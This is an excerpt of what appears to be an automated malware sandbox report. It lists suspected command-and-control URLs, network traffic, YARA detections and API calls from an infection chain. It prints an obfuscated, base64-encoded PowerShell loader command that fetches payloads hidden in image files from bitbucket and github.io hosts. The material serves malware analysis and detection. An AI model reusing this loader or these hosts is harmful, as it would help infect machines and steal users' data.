                            Source: MSBuild.exe, 00000017.00000002.2278686853.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2280963238.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hardswarehub.today/api
                            Source: MSBuild.exe, 00000017.00000002.2280963238.0000000000C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hardswarehub.today/apiLv
                            Source: MSBuild.exe, 00000017.00000002.2281119826.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hardswarehub.today/apigQP
                            Source: MSBuild.exe, 00000017.00000002.2282061438.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hardswarehub.today:443/api
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fdgfgdffffffff
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/profile/rest/profile&quot;
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io
                            Source: powershell.exe, 00000012.00000002.2277471538.0000021B910A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.000002038163A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ofice365.github.io/1/test.jpg
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                            Source: soft.exe, 00000005.00000002.1722674324.0000000009C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/
                            Source: soft.exe, 00000005.00000002.1722674324.0000000009CAE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/09AZaz
                            Source: soft.exe, 00000005.00000002.1722674324.0000000009C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/https://t.co/
                            Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
                            Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.v
                            Source: svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                            Source: svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000000.00000003.1365036015.00000232A5049000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365744024.00000232A5044000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365053907.00000232A5043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000000.00000003.1364932490.00000232A505D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 00000000.00000002.1365684533.00000232A5029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000000.00000002.1365700475.00000232A5033000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365094552.00000232A5031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvsXG
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                            Source: svchost.exe, 00000000.00000002.1365779307.00000232A5058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365075705.00000232A5057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                            Source: soft.exeString found in binary or memory: https://twitter.comif-unmodified-sinceillegal
                            Source: powershell.exe, 00000014.00000002.2005127260.00000203817FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                            Source: powershell.exe, 00000014.00000002.2005127260.0000020381817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2005127260.0000020381813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
                            Source: N7LnRW81Rfq.exe, 0000000B.00000003.1801319421.00000000021D1000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000002.2528478114.00000000021D1000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.exe, 0000000B.00000003.1801238876.0000000002400000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000002.2530459277.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000003.1803627841.0000000002148000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000003.1803547618.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, N7LnRW81Rfq.tmp, 0000000C.00000002.2531136083.0000000002148000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                            Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.7:49973 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.7:49974 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49976 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49977 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49978 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49979 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49980 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49981 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49982 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49983 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.7:49984 version: TLS 1.2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00440AF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,23_2_00440AF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00440AF0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,23_2_00440AF0

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 00000005.00000002.1724312184.000000000A03E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                            Source: 00000005.00000002.1724312184.0000000009FAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                            Source: 00000005.00000002.1724312184.0000000009F58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                            Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                            Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                            PE file has a writeable .text section
                            Source: ssdtoolbox.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: SSDToolBox.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                            Wscript starts Powershell (via cmd or directly)
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042F594 NtdllDefWindowProc_A,12_2_0042F594
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00423B94 NtdllDefWindowProc_A,12_2_00423B94
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004125E8 NtdllDefWindowProc_A,12_2_004125E8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00479380 NtdllDefWindowProc_A,12_2_00479380
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,12_2_0045763C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,12_2_0042E944
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,11_2_00409448
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_0045568C
